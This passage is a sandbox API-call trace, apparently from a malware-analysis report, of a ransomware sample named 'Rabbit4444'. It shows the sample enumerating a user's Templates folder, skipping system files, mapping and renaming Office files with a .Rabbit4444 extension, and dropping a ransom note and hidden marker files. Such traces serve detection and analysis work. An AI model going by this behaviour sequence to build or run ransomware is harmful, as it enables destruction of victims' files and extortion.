lstrcmpiW (lpString1="dotm", lpString2=".lnk") returned 1 [0052.393] lstrlenW (lpString=".ini") returned 4 [0052.393] lstrcmpiW (lpString1="dotm", lpString2=".ini") returned 1 [0052.393] lstrlenW (lpString=".sys") returned 4 [0052.393] lstrcmpiW (lpString1="dotm", lpString2=".sys") returned 1 [0052.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.393] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.393] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14370359962) returned 1 [0052.393] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17925) returned 1 [0052.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0052.393] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4910, lpName=0x0) returned 0x298 [0052.395] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4910) returned 0x70000 [0052.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.398] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0052.398] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14370889828) returned 1 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0052.398] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.398] CloseHandle (hObject=0x298) returned 1 [0052.399] CloseHandle (hObject=0x278) returned 1 [0052.399] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.Rabbit4444") returned 74 [0052.399] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\normal.dotm.rabbit4444"), dwFlags=0x1) returned 1 [0052.399] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xd92f3100, ftLastWriteTime.dwHighDateTime=0x1d32689, nFileSizeHigh=0x0, nFileSizeLow=0x78dd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Welcome to Excel.xltx", cAlternateFileName="WELCOM~1.XLT")) returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="Rabbit4444.exe") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2=".") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="..") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="windows") returned -1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="bootmgr") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="pagefile.sys") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="boot") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ids.txt") returned 1 [0052.399] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="NTUSER.DAT") returned 1 [0052.399] lstrcpyW (in: lpString1=0x130eba0, lpString2="Welcome to Excel.xltx" | out: lpString1="Welcome to Excel.xltx") returned="Welcome to Excel.xltx" [0052.399] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx", dwFileAttributes=0x0) returned 1 [0052.400] lstrlenW (lpString="Welcome to Excel.xltx") returned 21 [0052.400] lstrlenW (lpString="Rabbit4444") returned 10 [0052.400] lstrcmpiW (lpString1="Excel.xltx", lpString2="Rabbit4444") returned -1 [0052.400] lstrlenW (lpString=".dll") returned 4 [0052.400] lstrcmpiW (lpString1="xltx", lpString2=".dll") returned 1 [0052.400] lstrlenW (lpString=".lnk") returned 4 [0052.400] lstrcmpiW (lpString1="xltx", lpString2=".lnk") returned 1 [0052.400] lstrlenW (lpString=".ini") returned 4 [0052.400] lstrcmpiW (lpString1="xltx", lpString2=".ini") returned 1 [0052.400] lstrlenW (lpString=".sys") returned 4 [0052.400] lstrcmpiW (lpString1="xltx", lpString2=".sys") returned 1 [0052.400] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.400] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.400] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14371098666) returned 1 [0052.400] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=495058) returned 1 [0052.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0052.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0052.400] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790e0, lpName=0x0) returned 0x298 [0052.401] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790e0) returned 0x2b0000 [0052.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0052.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0052.416] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0052.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0052.417] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14372736497) returned 1 [0052.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0052.417] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0052.417] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0052.422] CloseHandle (hObject=0x298) returned 1 [0052.422] CloseHandle (hObject=0x278) returned 1 [0052.422] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.Rabbit4444") returned 84 [0052.422] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx.rabbit4444"), dwFlags=0x1) returned 1 [0052.422] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacac166f, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xacac166f, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xd92f3100, ftLastWriteTime.dwHighDateTime=0x1d32689, nFileSizeHigh=0x0, nFileSizeLow=0x78dd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Welcome to Excel.xltx", cAlternateFileName="WELCOM~1.XLT")) returned 0 [0052.423] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0052.423] lstrcpyW (in: lpString1=0x130eba0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.423] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.423] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.424] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.424] CloseHandle (hObject=0x278) returned 1 [0052.424] CloseHandle (hObject=0x27c) returned 1 [0052.424] GetCurrentThreadId () returned 0xd98 [0052.424] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120738 [0052.425] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0052.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0052.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120730 | out: hHeap=0xe0000) returned 1 [0052.425] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0052.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\" [0052.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3" [0052.425] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.426] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.428] FlushFileBuffers (hFile=0x27c) returned 1 [0052.429] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.430] CloseHandle (hObject=0x27c) returned 1 [0052.430] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned 63 [0052.430] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.430] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe892c0a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0052.430] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.430] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.430] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.430] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.430] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe892c0a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.430] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.430] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.430] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.430] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.430] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.431] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe892c0a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe892c0a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe892c0a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.431] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.431] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.431] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0052.431] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.431] lstrcmpiW (lpString1="16", lpString2="Rabbit4444.exe") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0052.431] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0052.431] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0052.431] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0052.431] lstrcpyW (in: lpString1=0x130ebb8, lpString2="16" | out: lpString1="16") returned="16" [0052.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120550 [0052.431] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x86) returned 0x106540 [0052.431] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120558 | out: ListHead=0xf68b0, ListEntry=0x120558) returned 0x120538 [0052.431] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0052.431] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0052.431] lstrcpyW (in: lpString1=0x130ebb8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.433] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.433] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.433] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.433] CloseHandle (hObject=0x278) returned 1 [0052.433] CloseHandle (hObject=0x27c) returned 1 [0052.433] GetCurrentThreadId () returned 0xd98 [0052.433] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120558 [0052.433] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0052.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0052.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120550 | out: hHeap=0xe0000) returned 1 [0052.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0052.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\" [0052.434] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3" [0052.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.435] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.439] FlushFileBuffers (hFile=0x27c) returned 1 [0052.440] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.440] CloseHandle (hObject=0x27c) returned 1 [0052.441] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned 66 [0052.441] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.441] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe892c0a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0052.441] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.441] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.441] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.441] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.441] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe892c0a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.441] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.441] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.441] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.441] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.441] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.441] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe892c0a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe892c0a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe89543cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.441] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.441] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.442] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Managed", cAlternateFileName="")) returned 